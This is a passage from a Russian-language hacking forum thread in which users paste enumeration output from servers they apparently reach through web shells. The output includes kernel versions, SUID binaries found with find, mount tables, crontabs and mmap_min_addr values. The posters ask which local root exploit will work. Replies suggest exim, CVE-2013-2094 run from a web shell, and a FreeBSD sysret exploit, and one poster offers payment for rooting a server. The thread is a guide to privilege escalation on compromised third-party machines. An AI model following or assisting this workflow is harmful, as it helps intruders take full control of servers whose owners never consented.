-rwsr-xr-- 1 root messagebus 45936 Jun 14 2011 /usr/lib/dbus-1.0/dbus-daemon-la
unch-helper
-rwsr-xr-x 1 root root 212128 Dec 27 2010 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 10592 Feb 12 2012 /usr/lib/pt_chown
-rwsr-xr-- 1 root www-data 18944 Feb 6 2012 /usr/lib/apache2/suexec
-rwsr-xr-x 2 root root 166312 Mar 6 2013 /usr/bin/sudo
-rwsr-xr-x 1 root root 32808 Feb 15 2011 /usr/bin/newgrp
-rwsr-xr-x 1 root root 43280 Feb 15 2011 /usr/bin/passwd
-rwsr-sr-x 1 root mail 89720 Apr 26 2010 /usr/bin/procmail
-rwsr-xr-x 1 root root 39856 Feb 15 2011 /usr/bin/chfn
-rwsr-xr-x 2 root root 166312 Mar 6 2013 /usr/bin/sudoedit
-rwsr-xr-x 1 root root 60208 Feb 15 2011 /usr/bin/gpasswd
-rwsr-sr-x 1 daemon daemon 48416 Nov 30 2009 /usr/bin/at
-rwsr-xr-x 1 root root 4536 Dec 14 2006 /usr/bin/procmail-wrapper
-rwsr-xr-x 1 root root 37552 Feb 15 2011 /usr/bin/chsh

вторая выдает очень очень много строк, и файлов разных форматов включая jpg

d4rk73rr0r

07.01.2015, 14:14

$ uname -a

Code:
Linux ****** 2.6.26-2-amd64 #1 SMP Wed Sep 21 03:36:44 UTC 2011 x86_64 GNU/Linux

$ ls -la /boot

Code:
total 17175
drwxr-xr-x 4 root root 1024 Mar 1 2012 .
drwxr-xr-x 22 root root 4096 Sep 23 2013 ..
-rw-r--r-- 1 root root 1227280 Sep 21 2011 System.map-2.6.26-2-amd64
-rw-r--r-- 1 root root 85694 Sep 21 2011 config-2.6.26-2-amd64
drwxr-xr-x 2 root root 1024 Mar 1 2012 grub
-rw-r--r-- 1 root root 7757503 Mar 1 2012 initrd.img-2.6.26-2-amd64
-rw-r--r-- 1 root root 6665119 Jul 7 2011 initrd.img-2.6.26-2-amd64.bak
drwx------ 2 root root 12288 Nov 23 2010 lost+found
-rw-r--r-- 1 root root 1756944 Sep 21 2011 vmlinuz-2.6.26-2-amd64

$ ls -la --full-time /lib/libc*

Code:
-rwxr-xr-x 1 root root 1375536 2011-01-08 02:33:04.000000000 +0500 /lib/libc-2.7.so
lrwxrwxrwx 1 root root 11 2011-01-23 19:16:16.000000000 +0500 /lib/libc.so.6 -> libc-2.7.so
lrwxrwxrwx 1 root root 14 2010-11-23 17:33:39.000000000 +0500 /lib/libcap.so.1 -> libcap.so.1.10
-rw-r--r-- 1 root root 14880 2006-03-16 16:56:29.000000000 +0500 /lib/libcap.so.1.10
lrwxrwxrwx 1 root root 14 2010-11-23 16:58:17.000000000 +0500 /lib/libcap.so.2 -> libcap.so.2.11
-rw-r--r-- 1 root root 16976 2008-07-26 20:52:16.000000000 +0500 /lib/libcap.so.2.11
lrwxrwxrwx 1 root root 17 2010-11-23 16:23:24.000000000 +0500 /lib/libcfont.so.0 -> libcfont.so.0.0.0
-rw-r--r-- 1 root root 12776 2008-04-16 02:40:42.000000000 +0500 /lib/libcfont.so.0.0.0
-rw-r--r-- 1 root root 190760 2011-01-08 02:33:04.000000000 +0500 /lib/libcidn-2.7.so
lrwxrwxrwx 1 root root 14 2011-01-23 19:16:16.000000000 +0500 /lib/libcidn.so.1 -> libcidn-2.7.so
lrwxrwxrwx 1 root root 17 2010-11-23 16:22:49.000000000 +0500 /lib/libcom_err.so.2 -> libcom_err.so.2.1
-rw-r--r-- 1 root root 11648 2008-10-13 08:54:02.000000000 +0500 /lib/libcom_err.so.2.1
lrwxrwxrwx 1 root root 19 2010-11-23 16:23:24.000000000 +0500 /lib/libconsole.so.0 -> libconsole.so.0.0.0
-rw-r--r-- 1 root root 140840 2008-04-16 02:40:42.000000000 +0500 /lib/libconsole.so.0.0.0
-rw-r--r-- 1 root root 39112 2011-01-08 02:33:04.000000000 +0500 /lib/libcrypt-2.7.so
lrwxrwxrwx 1 root root 15 2011-01-23 19:16:16.000000000 +0500 /lib/libcrypt.so.1 -> libcrypt-2.7.so
lrwxrwxrwx 1 root root 19 2010-11-23 16:23:24.000000000 +0500 /lib/libctutils.so.0 -> libctutils.so.0.0.0
-rw-r--r-- 1 root root 21024 2008-04-16 02:40:42.000000000 +0500 /lib/libctutils.so.0.0.0

$ mount

Code:
/dev/cciss/c0d0p7 on / type ext3 (rw,errors=remount-ro)
tmpfs on /lib/init/rw type tmpfs (rw,nosuid,mode=0755)
proc on /proc type proc (rw,noexec,nosuid,nodev)
sysfs on /sys type sysfs (rw,noexec,nosuid,nodev)
procbususb on /proc/bus/usb type usbfs (rw)
udev on /dev type tmpfs (rw,mode=0755)
tmpfs on /dev/shm type tmpfs (rw,nosuid,nodev)
devpts on /dev/pts type devpts (rw,noexec,nosuid,gid=5,mode=620)
/dev/cciss/c0d0p1 on /boot type ext3 (rw)
/dev/cciss/c0d0p8 on /root type ext3 (rw)
/dev/cciss/c0d0p6 on /tmp type ext3 (rw)
/dev/cciss/c0d0p9 on /usr type ext3 (rw)
/dev/cciss/c0d0p10 on /var type ext3 (rw)

$ df -h

Code:
Filesystem Size Used Avail Use% Mounted on
/dev/cciss/c0d0p7 5.5G 258M 5.0G 5% /
tmpfs 3.0G 0 3.0G 0% /lib/init/rw
udev 10M 840K 9.2M 9% /dev
tmpfs 3.0G 0 3.0G 0% /dev/shm
/dev/cciss/c0d0p1 464M 28M 413M 7% /boot
/dev/cciss/c0d0p8 9.2G 4.8G 4.0G 55% /root
/dev/cciss/c0d0p6 2.8G 69M 2.6G 3% /tmp
/dev/cciss/c0d0p9 321G 1.2G 304G 1% /usr
/dev/cciss/c0d0p10 576G 34G 513G 7% /var

$ cat /etc/issue

Code:
Debian GNU/Linux 5.0 \n \l

$ cat /etc/crontab

Code:
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#

$ cat /proc/version

Code:
Linux version 2.6.26-2-amd64 (Debian 2.6.26-27) (dannf@debian.org) (gcc version 4.1.3 20080704 (prerelease) (Debian 4.1.2-25)) #1

SMP Wed Sep 21 03:36:44 UTC 2011

$ cat /proc/sys/vm/mmap_min_addr

Code:
4096

$ pwd

Code:
/var/www/dtl

$ ls -la /usr/bin/staprun

Code:
Результат ноль

$ find / -type f -perm -u+s -exec ls -la {} \; 2>/dev/null

Code:
-rwsr-sr-x 1 daemon daemon 46200 Sep 23 2008 /usr/bin/at
-rwsr-xr-x 1 root root 39104 Dec 6 2009 /usr/bin/passwd
---s--x--x 2 root root 127432 Jun 11 2010 /usr/bin/sudo
---s--x--x 2 root root 127432 Jun 11 2010 /usr/bin/sudoedit
-rwsr-xr-x 1 root root 73736 Apr 17 2008 /usr/bin/mtr
-rwsr-xr-x 1 root root 49536 Dec 6 2009 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 36416 Dec 6 2009 /usr/bin/chfn
-rwsr-sr-x 1 root mail 85472 Apr 30 2006 /usr/bin/procmail
-rwsr-xr-x 1 root root 33376 Dec 6 2009 /usr/bin/chsh
-rwsr-xr-x 1 root root 28600 Dec 6 2009 /usr/bin/newgrp
-rwsr-xr-x 1 root root 6696 Oct 3 2008 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-- 1 root messagebus 44968 Jan 15 2011 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 212656 Jan 14 2009 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 10512 Jan 8 2011 /usr/lib/pt_chown
-rwsr-xr-x 1 root root 850000 Jan 31 2011 /usr/sbin/exim4
-rwsr-xr-x 1 root root 76344 Apr 19 2010 /sbin/mount.nfs
-rwsr-xr-x 1 root root 46040 Apr 29 2008 /bin/umount
-rwsr-xr-x 1 root root 33528 Jul 25 2010 /bin/ping
-rwsr-xr-x 1 root root 66152 Apr 29 2008 /bin/mount
-rwsr-xr-x 1 root root 33112 Dec 6 2009 /bin/su
-rwsr-xr-x 1 root root 28944 Jul 25 2010 /bin/ping6

Помогите новичкам найти эксплоит для этого сервака

ZodiaX

07.01.2015, 16:48

bash уязвим?

YaBtr

09.01.2015, 14:19

d4rk73rr0r, посмотрите в сторону exim.

попугай

16.01.2015, 01:38

2.6.9-103.ELsmp #1 SMP Fri Dec 9 04:31:51 EST 2011 i686

cat /proc/sys/vm/mmap_min_addr показывает 0 - это баг по идее?

YaBtr

16.01.2015, 09:36

попугай said:
2.6.9-103.ELsmp #1 SMP Fri Dec 9 04:31:51 EST 2011 i686
cat /proc/sys/vm/mmap_min_addr показывает 0 - это баг по идее?

Это не баг, это одна из настроек ядра, позволяющая успешно отработать сплоентам, использующим NULL page.

попугай

23.01.2015, 02:34

Реально ли порутать такое?

http://pastebin.com/MtDGyZwZ

Если есть профессионалы, пишите в личку, заплачу в случае успеха.

//YaBtr: Что пробовал?.

YaBtr

27.01.2015, 09:44

foma9999 said:
Linux by106.activeby.net 2.6.32-431.el6.x86_64 #1 SMP Sun Nov 10 22:19:54 EST 2013 i686 i686 i386 GNU/Linux
gcc не работает, пишет, что такой комманды нема.
Когда пытаюсь установить его, пишет, что для этого нужен рут
$ ls -la /boot 2>&1
total 5324
drwxr-xr-x 2 root root 4096 May 11 2011 .
drwxr-xr-x 23 root root 4096 Sep 5 15:20 ..
-rw-r--r-- 1 root root 162 Dec 5 2013 .vmlinuz-2.6.18-371.3.1.el5.hmac
-rw-r--r-- 1 root root 996296 Dec 5 2013 System.map-2.6.18-371.3.1.el5
-rw-r--r-- 1 root root 70404 Dec 5 2013 config-2.6.18-371.3.1.el5
-rw------- 1 root root 2333990 Dec 19 2013 initrd-2.6.18-371.3.1.el5.img
-rw-r--r-- 1 root root 117436 Dec 5 2013 symvers-2.6.18-371.3.1.el5.gz
-rw-r--r-- 1 root root 1912180 Dec 5 2013 vmlinuz-2.6.18-371.3.1.el5
cat /etc/issue 2>&1
CentOS release 5.10 (Final)
Kernel \r on an \m
$ mount 2>&1
/dev/root on / type reiserfs (rw,relatime,usrquota,grpquota)
tmpfs on /dev/shm type tmpfs (rw)
none on /proc/sys/fs/binfmt_misc type binfmt_misc (rw)
rw on /proc/sys type unknown (rw)
none on /var/spool/eaccelerator type tmpfs (rw,size=7516192768)
none on /var/spool/eaccelerator/sessions type tmpfs (rw,size=536870912)
none on /var/spool/exim/mem type tmpfs (rw,size=2147483648)
10.159.247.29:/backup2/btku-cludbs-2/btku-cludb2 on /backup/mysql type nfs (rw,addr=10.159.247.29)
10.159.243.46:/backup/btku-linsh-04 on /backup/rootfs type nfs (rw,remount,addr=10.159.243.46)
1747 ( tatyana ) Group: 1749 ( tatyana )

Пробуйте

CVE-2013-2094 Linux 2.6.32/2.6.37 - 3.8.10 PERF_EVENTS local root x86_64 (и x86) , который из-под веб-шелла.

Всех касается! Не забываем выполнять требования, прописанные в первом посте!

YaBtr

20.02.2015, 09:18

Export said:
Привет. Подскажите сплойт.
UNAME -a

Code:
FreeBSD site.com 8.3-RELEASE FreeBSD 8.3-RELEASE #0: Mon Apr 9 21:23:18 UTC 2012 *******************:/usr/obj/usr/src/sys/GENERIC amd64

https://fail0verflow.com/blog/2012/cve-2012-0217-intel-sysret-freebsd.html

psihoz26

20.02.2015, 14:53

Есть у кого рабочий сплоент под:

Code:
Linux vds.firmixal.info 2.6.18-348.16.1.el5.028stab108.1 #1 SMP Tue Aug 27 13:02:53 MSD 2013 x86_64

??

с эксплоит-дб не компилируется

DezMond™

03.03.2015, 20:48

uname -a

2.6.32-504.el6.x86_64 #1 SMP Tue Sep 16 01:56:35 EDT 2014 x86_64

ls -la /boot

total 85642

dr-xr-xr-x. 5 root root 3072 Dec 4 12:14 .

dr-xr-xr-x. 24 root root 4096 Jan 29 17:44 ..

-rw-r--r-- 1 root root 171 Apr 11 2014 .vmlinuz-2.6.32-431.17.1.el6.x86_64.hmac

-rw-r--r-- 1 root root 170 Oct 31 16:43 .vmlinuz-2.6.32-504.1.3.el6.x86_64.hmac

-rw-r--r-- 1 root root 166 Sep 16 08:04 .vmlinuz-2.6.32-504.el6.x86_64.hmac

-rw-r--r-- 1 root root 2518959 Apr 11 2014 System.map-2.6.32-431.17.1.el6.x86_64

-rw-r--r-- 1 root root 2544748 Oct 31 16:43 System.map-2.6.32-504.1.3.el6.x86_64

-rw-r--r-- 1 root root 2544748 Sep 16 08:04 System.map-2.6.32-504.el6.x86_64

-rw-r--r-- 1 root root 105200 Apr 11 2014 config-2.6.32-431.17.1.el6.x86_64

-rw-r--r-- 1 root root 106312 Oct 31 16:43 config-2.6.32-504.1.3.el6.x86_64

-rw-r--r-- 1 root root 106308 Sep 16 08:04 config-2.6.32-504.el6.x86_64

drwxr-xr-x. 3 root root 1024 Jul 30 2012 efi

drwxr-xr-x. 2 root root 1024 Dec 4 12:11 grub

-rw------- 1 root root 17186604 May 16 2014 initramfs-2.6.32-431.17.1.el6.x86_64.img

-rw------- 1 root root 19168484 Dec 4 12:09 initramfs-2.6.32-504.1.3.el6.x86_64.img

-rw------- 1 root root 19167416 Dec 4 12:11 initramfs-2.6.32-504.el6.x86_64.img

-rw------- 1 root root 5585988 Dec 4 12:08 initrd-2.6.32-431.17.1.el6.x86_64kdump.img

-rw------- 1 root root 5233991 Dec 4 12:14 initrd-2.6.32-504.el6.x86_64kdump.img

drwx------. 2 root root 12288 Jul 30 2012 lost+found

-rw-r--r-- 1 root root 193889 Apr 11 2014 symvers-2.6.32-431.17.1.el6.x86_64.gz

-rw-r--r-- 1 root root 200191 Oct 31 16:44 symvers-2.6.32-504.1.3.el6.x86_64.gz

-rw-r--r-- 1 root root 200191 Sep 16 08:04 symvers-2.6.32-504.el6.x86_64.gz

-rwxr-xr-x 1 root root 4130640 Apr 11 2014 vmlinuz-2.6.32-431.17.1.el6.x86_64

-rwxr-xr-x 1 root root 4153008 Oct 31 16:43 vmlinuz-2.6.32-504.1.3.el6.x86_64

-rwxr-xr-x 1 root root 4153904 Sep 16 08:04 vmlinuz-2.6.32-504.el6.x86_64

$ cat /etc/issue

RedHat Enterprise Linux Server 6.6

Authorized uses only by personnel of tubIT IT-Service-Center. All activity may be monitored and reported.

$ cat /proc/version

Linux version 2.6.32-504.el6.x86_64 (mockbuild@x86-023.build.eng.bos.redhat.com) (gcc version 4.4.7 20120313 (Red Hat 4.4.7-11) (GCC) ) #1 SMP Tue Sep 16 01:56:35 EDT 2014

$ cat /proc/sys/vm/mmap_min_addr

4096

$ ls -la /usr/bin/staprun

---s--x--- 1 root stapusr 183072 Jun 23 2014 /usr/bin/staprun

Чем можно взять?

YaBtr

04.03.2015, 09:29

DezMond™ said:
uname -a
2.6.32-504.el6.x86_64 #1 SMP Tue Sep 16 01:56:35 EDT 2014 x86_64
Чем можно взять?

Ничем, где остальные команды и их результаты работы?

DezMond™

04.03.2015, 09:48

YaBtr said:
Ничем, где остальные команды и их результаты работы?

не выполняются

sysjuk

25.03.2015, 16:17

Code:
[apache@vs01.**********.ru ~]$ uname -a
Linux ********** 2.6.32-042stab093.4 #1 SMP Mon Aug 11 18:47:39 MSK 2014 x86_64 x86_64 x86_64 GNU/Linux
[apache@vs01.**********.ru ~]$ ls -la /boot
total 12
dr-xr-xr-x 3 root root 4096 Feb 20 2014 ./
dr-xr-xr-x 25 root root 4096 Mar 25 03:33 ../
drwxr-xr-x 2 root root 4096 Dec 22 2012 grub/
[apache@vs01.**********.ru ~]$ ls -la --full-time /lib64
total 15272
dr-xr-xr-x 7 root root 12288 2015-01-29 05:33:43.633230136 +0300 ./
dr-xr-xr-x 25 root root 4096 2015-03-25 03:33:40.839381604 +0300 ../
-rwxr-xr-x 1 root root 157032 2015-01-27 22:38:10.000000000 +0300 ld-2.12.so*
lrwxrwxrwx 1 root root 10 2015-01-28 15:09:32.320483506 +0300 ld-linux-x86-64.so.2 -> ld-2.12.so*
lrwxrwxrwx 1 root root 15 2013-01-16 16:10:56.000000000 +0400 libacl.so.1 -> libacl.so.1.1.0*
-rwxr-xr-x 1 root root 33816 2011-12-07 20:53:53.000000000 +0400 libacl.so.1.1.0*
lrwxrwxrwx 1 root root 22 2013-01-16 16:10:56.000000000 +0400 libaio.so.1 -> /lib64/libaio.so.1.0.1*
-rwxr-xr-x 1 root root 3944 2010-08-23 01:08:18.000000000 +0400 libaio.so.1.0.0*
-rwxr-xr-x 1 root root 5624 2010-08-23 01:08:18.000000000 +0400 libaio.so.1.0.1*
-rwxr-xr-x 1 root root 19368 2015-01-27 22:38:11.000000000 +0300 libanl-2.12.so*
lrwxrwxrwx 1 root root 14 2015-01-28 15:09:32.336483881 +0300 libanl.so.1 -> libanl-2.12.so*
lrwxrwxrwx 1 root root 16 2013-01-16 16:10:56.000000000 +0400 libattr.so.1 -> libattr.so.1.1.0*
-rwxr-xr-x 1 root root 21152 2011-09-23 22:53:58.000000000 +0400 libattr.so.1.1.0*
lrwxrwxrwx 1 root root 17 2014-06-11 16:00:30.542733378 +0400 libaudit.so.1 -> libaudit.so.1.0.0*
-rwxr-xr-x 1 root root 115536 2014-05-28 18:37:08.000000000 +0400 libaudit.so.1.0.0*
lrwxrwxrwx 1 root root 19 2014-06-11 16:00:30.546728783 +0400 libauparse.so.0 -> libauparse.so.0.0.0*
-rwxr-xr-x 1 root root 59920 2014-05-28 18:37:08.000000000 +0400 libauparse.so.0.0.0*
lrwxrwxrwx 1 root root 17 2013-08-26 16:29:27.502862788 +0400 libblkid.so.1 -> libblkid.so.1.1.0*
-rwxr-xr-x 1 root root 138616 2013-04-29 11:43:56.000000000 +0400 libblkid.so.1.1.0*
-rwxr-xr-x 1 root root 8488 2015-01-27 22:38:11.000000000 +0300 libBrokenLocale-2.12.so*
lrwxrwxrwx 1 root root 23 2015-01-28 15:09:32.321483496 +0300 libBrokenLocale.so.1 -> libBrokenLocale-2.12.so*
lrwxrwxrwx 1 root root 15 2013-01-16 16:10:56.000000000 +0400 libbz2.so.1 -> libbz2.so.1.0.4*
-rwxr-xr-x 1 root root 69976 2011-06-25 05:45:55.000000000 +0400 libbz2.so.1.0.4*
-rwxr-xr-x 1 root root 1926760 2015-01-27 22:38:13.000000000 +0300 libc-2.12.so*
lrwxrwxrwx 1 root root 18 2013-01-16 16:10:56.000000000 +0400 libcap-ng.so.0 -> libcap-ng.so.0.0.0*
-rwxr-xr-x 1 root root 18672 2011-06-25 07:49:32.000000000 +0400 libcap-ng.so.0.0.0*
lrwxrwxrwx 1 root root 14 2013-01-16 16:10:56.000000000 +0400 libcap.so.2 -> libcap.so.2.16*
-rwxr-xr-x 1 root root 19016 2011-12-08 00:04:01.000000000 +0400 libcap.so.2.16*
lrwxrwxrwx 1 root root 19 2014-06-11 16:33:41.480854133 +0400 libcgroup.so.1 -> libcgroup.so.1.0.40*
-rwxr-xr-x 1 root root 97016 2013-12-09 12:36:08.000000000 +0400 libcgroup.so.1.0.40*
-rwxr-xr-x 1 root root 197064 2015-01-27 22:38:10.000000000 +0300 libcidn-2.12.so*
lrwxrwxrwx 1 root root 15 2015-01-28 15:09:32.910483773 +0300 libcidn.so.1 -> libcidn-2.12.so*
lrwxrwxrwx 1 root root 17 2014-04-09 10:20:39.772791310 +0400 libcom_err.so.2 -> libcom_err.so.2.1*
-rwxr-xr-x 1 root root 17256 2013-11-22 16:56:01.000000000 +0400 libcom_err.so.2.1*
-rwxr-xr-x 1 root root 43392 2015-01-27 22:38:10.000000000 +0300 libcrypt-2.12.so*
lrwxrwxrwx 1 root root 16 2015-01-28 15:09:32.920483906 +0300 libcrypt.so.1 -> libcrypt-2.12.so*
lrwxrwxrwx 1 root root 12 2015-01-28 15:09:32.901484045 +0300 libc.so.6 -> libc-2.12.so*
-rwxr-xr-x 1 root root 1525224 2013-09-12 13:40:56.000000000 +0400 libdb-4.7.so*
lrwxrwxrwx 1 root root 18 2013-01-16 16:10:56.000000000 +0400 libdbus-1.so.3 -> libdbus-1.so.3.4.0*
-rwxr-xr-x 1 root root 268232 2012-09-13 21:04:29.000000000 +0400 libdbus-1.so.3.4.0*
-rwxr-xr-x 1 root root 22536 2015-01-27 22:38:10.000000000 +0300 libdl-2.12.so*
lrwxrwxrwx 1 root root 13 2015-01-28 15:09:32.921483889 +0300 libdl.so.2 -> libdl-2.12.so*
lrwxrwxrwx 1 root root 13 2014-04-09 10:20:41.666729887 +0400 libe2p.so.2 -> libe2p.so.2.3*
-rwxr-xr-x 1 root root 30552 2013-11-22 16:56:01.000000000 +0400 libe2p.so.2.3*
lrwxrwxrwx 1 root root 17 2013-01-16 16:10:56.000000000 +0400 libexpat.so.1 -> libexpat.so.1.5.2*
-rwxr-xr-x 1 root root 167648 2012-06-13 19:01:40.000000000 +0400 libexpat.so.1.5.2*
lrwxrwxrwx 1 root root 16 2014-04-09 10:20:41.667729935 +0400 libext2fs.so.2 -> libext2fs.so.2.4*
-rwxr-xr-x 1 root root 204296 2013-11-22 16:56:01.000000000 +0400 libext2fs.so.2.4*
lrwxrwxrwx 1 root root 21 2013-01-16 16:10:56.000000000 +0400 libfipscheck.so.1 -> libfipscheck.so.1.1.0*
-rwxr-xr-x 1 root root 12688 2011-12-07 23:13:53.000000000 +0400 libfipscheck.so.1.1.0*
-rw-r--r-- 1 root root 65 2011-12-07 23:13:53.000000000 +0400 .libfipscheck.so.1.1.0.hmac
lrwxrwxrwx 1 root root 27 2013-01-16 16:10:56.000000000 +0400 .libfipscheck.so.1.hmac -> .libfipscheck.so.1.1.0.hmac
-rw-r--r-- 1 root root 899 2013-08-08 00:19:37.000000000 +0400 libfreebl3.chk
-rwxr-xr-x 1 root root 427008 2013-08-08 00:19:37.000000000 +0400 libfreebl3.so*
-rwxr-xr-x 1 root root 93320 2013-11-21 22:08:46.000000000 +0400 libgcc_s-4.4.7-20120601.so.1*
lrwxrwxrwx 1 root root 28 2014-04-09 10:20:25.611916602 +0400 libgcc_s.so.1 -> libgcc_s-4.4.7-20120601.so.1*
lrwxrwxrwx 1 root root 19 2013-01-16 16:10:56.000000000 +0400 libgcrypt.so.11 -> libgcrypt.so.11.5.3*
-rwxr-xr-x 1 root root 481064 2012-04-16 17:21:17.000000000 +0400 libgcrypt.so.11.5.3*
-rw-r--r-- 1 root root 65 2012-04-16 17:21:17.000000000 +0400 .libgcrypt.so.11.hmac
lrwxrwxrwx 1 root root 22 2013-01-16 16:10:56.000000000 +0400 libgio-2.0.so.0 -> libgio-2.0.so.0.2200.5*
-rwxr-xr-x 1 root root 695464 2012-06-22 10:17:18.000000000 +0400 libgio-2.0.so.0.2200.5*
lrwxrwxrwx 1 root root 23 2013-01-16 16:10:56.000000000 +0400 libglib-2.0.so.0 -> libglib-2.0.so.0.2200.5*
-rwxr-xr-x 1 root root 939360 2012-06-22 10:17:18.000000000 +0400 libglib-2.0.so.0.2200.5*
lrwxrwxrwx 1 root root 26 2013-01-16 16:10:56.000000000 +0400 libgmodule-2.0.so.0 -> libgmodule-2.0.so.0.2200.5*
-rwxr-xr-x 1 root root 14392 2012-06-22 10:17:18.000000000 +0400 libgmodule-2.0.so.0.2200.5*
lrwxrwxrwx 1 root root 26 2013-01-16 16:10:56.000000000 +0400 libgobject-2.0.so.0 -> libgobject-2.0.so.0.2200.5*
-rwxr-xr-x 1 root root 283584 2012-06-22 10:17:18.000000000 +0400 libgobject-2.0.so.0.2200.5*
lrwxrwxrwx 1 root root 21 2013-01-16 16:10:56.000000000 +0400 libgpg-error.so.0 -> libgpg-error.so.0.5.0*
-rwxr-xr-x 1 root root 16656 2011-12-07 21:37:21.000000000 +0400 libgpg-error.so.0.5.0*
lrwxrwxrwx 1 root root 21 2014-04-09 10:20:41.259728928 +0400 libgssapi_krb5.so.2 -> libgssapi_krb5.so.2.2*
-rwxr-xr-x 1 root root 280520 2014-04-03 19:12:22.000000000 +0400 libgssapi_krb5.so.2.2*
lrwxrwxrwx 1 root root 19 2013-01-16 16:10:56.000000000 +0400 libgssglue.so.1 -> libgssglue.so.1.0.0*
-rwxr-xr-x 1 root root 36584 2011-07-19 12:22:02.000000000 +0400 libgssglue.so.1.0.0*
lrwxrwxrwx 1 root root 16 2014-04-09 10:20:41.270729039 +0400 libgssrpc.so.4 -> libgssrpc.so.4.1*
-rwxr-xr-x 1 root root 131384 2014-04-03 19:12:22.000000000 +0400 libgssrpc.so.4.1*
lrwxrwxrwx 1 root root 26 2013-01-16 16:10:56.000000000 +0400 libgthread-2.0.so.0 -> libgthread-2.0.so.0.2200.5*
-rwxr-xr-x 1 root root 17440 2012-06-22 10:17:18.000000000 +0400 libgthread-2.0.so.0.2200.5*
lrwxrwxrwx 1 root root 16 2013-01-16 16:10:56.000000000 +0400 libidn.so.11 -> libidn.so.11.6.1*
-rwxr-xr-x 1 root root 209120 2010-08-24 04:51:20.000000000 +0400 libidn.so.11.6.1*
lrwxrwxrwx 1 root root 34 2013-08-26 16:30:17.379674066 +0400 libip4tc.so.0 -> /etc/alternatives/libip4tc0.x86_64*
lrwxrwxrwx 1 root root 36 2013-08-26 16:30:17.379674066 +0400 libip4tc.so.0.0.0 -> /etc/alternatives/libip4tc000.x86_64*
-rwxr-xr-x 1 root root 28544 2013-02-22 05:45:53.000000000 +0400 libip4tc.so.0.0.0-1.4.7*
lrwxrwxrwx 1 root root 23 2013-08-26 16:29:33.590486490 +0400 libip4tc.so.0-1.4.7 -> libip4tc.so.0.0.0-1.4.7*
lrwxrwxrwx 1 root root 34 2013-08-26 16:30:17.379674066 +0400 libip6tc.so.0 -> /etc/alternatives/libip6tc0.x86_64*
lrwxrwxrwx 1 root root 36 2013-08-26 16:30:17.379674066 +0400 libip6tc.so.0.0.0 -> /etc/alternatives/libip6tc000.x86_64*
-rwxr-xr-x 1 root root 28064 2013-02-22 05:45:53.000000000 +0400 libip6tc.so.0.0.0-1.4.7*
lrwxrwxrwx 1 root root 23 2013-08-26 16:29:33.592486500 +0400 libip6tc.so.0-1.4.7 -> libip6tc.so.0.0.0-1.4.7*
lrwxrwxrwx 1 root root 32 2013-08-26 16:30:17.379674066 +0400 libipq.so.0 -> /etc/alternatives/libipq0.x86_64*
lrwxrwxrwx 1 root root 34 2013-08-26 16:30:17.379674066 +0400 libipq.so.0.0.0 -> /etc/alternatives/libipq000.x86_64*
-rwxr-xr-x 1 root root 9280 2013-02-22 05:45:53.000000000 +0400 libipq.so.0.0.0-1.4.7*
lrwxrwxrwx 1 root root 21 2013-08-26 16:29:33.593486534 +0400 libipq.so.0-1.4.7 -> libipq.so.0.0.0-1.4.7*
lrwxrwxrwx 1 root root 33 2013-08-26 16:30:17.379674066 +0400 libiptc.so.0 -> /etc/alternatives/libiptc0.x86_64*
lrwxrwxrwx 1 root root 35 2013-08-26 16:30:17.379674066 +0400 libiptc.so.0.0.0 -> /etc/alternatives/libiptc000.x86_64*
-rwxr-xr-x 1 root root 3680 2013-02-22 05:45:53.000000000 +0400 libiptc.so.0.0.0-1.4.7*
lrwxrwxrwx 1 root root 22 2013-08-26 16:29:33.594486893 +0400 libiptc.so.0-1.4.7 -> libiptc.so.0.0.0-1.4.7*
lrwxrwxrwx 1 root root 18 2014-04-09 10:20:41.275734947 +0400 libk5crypto.so.3 -> libk5crypto.so.3.1*
-rwxr-xr-x 1 root root 177520 2014-04-03 19:12:22.000000000 +0400 libk5crypto.so.3.1*
lrwxrwxrwx 1 root root 18 2013-01-16 16:10:56.000000000 +0400 libkeyutils.so.1 -> libkeyutils.so.1.3*
-rwxr-xr-x 1 root root 12592 2012-06-22 10:20:37.000000000 +0400 libkeyutils.so.1.3*
lrwxrwxrwx 1 root root 14 2014-04-09 10:20:41.282731023 +0400 libkrb5.so.3 -> libkrb5.so.3.3*
-rwxr-xr-x 1 root root 944712 2014-04-03 19:12:22.000000000 +0400 libkrb5.so.3.3*
lrwxrwxrwx 1 root root 21 2014-04-09 10:20:41.315755231 +0400 libkrb5support.so.0 -> libkrb5support.so.0.1*
-rwxr-xr-x 1 root root 46368 2014-04-03 19:12:22.000000000 +0400 libkrb5support.so.0.1*
lrwxrwxrwx 1 root root 20 2013-08-26 16:29:30.369736593 +0400 liblber-2.4.so.2 -> liblber-2.4.so.2.5.6*
-rwxr-xr-x 1 root root 63336 2013-04-29 11:50:08.000000000 +0400 liblber-2.4.so.2.5.6*
lrwxrwxrwx 1 root root 20 2013-08-26 16:29:30.371736205 +0400 libldap-2.4.so.2 -> libldap-2.4.so.2.5.6*
-rwxr-xr-x 1 root root 317200 2013-04-29 11:50:08.000000000 +0400 libldap-2.4.so.2.5.6*
lrwxrwxrwx 1 root root 22 2013-08-26 16:29:30.383737800 +0400 libldap_r-2.4.so.2 -> libldap_r-2.4.so.2.5.6*
-rwxr-xr-x 1 root root 335264 2013-04-29 11:50:08.000000000 +0400 libldap_r-2.4.so.2.5.6*
lrwxrwxrwx 1 root root 20 2013-08-26 16:29:30.391548803 +0400 libldif-2.4.so.2 -> libldif-2.4.so.2.5.6*
-rwxr-xr-x 1 root root 18736 2013-04-29 11:50:08.000000000 +0400 libldif-2.4.so.2.5.6*
-rwxr-xr-x 1 root root 599392 2015-01-27 22:38:12.000000000 +0300 libm-2.12.so*
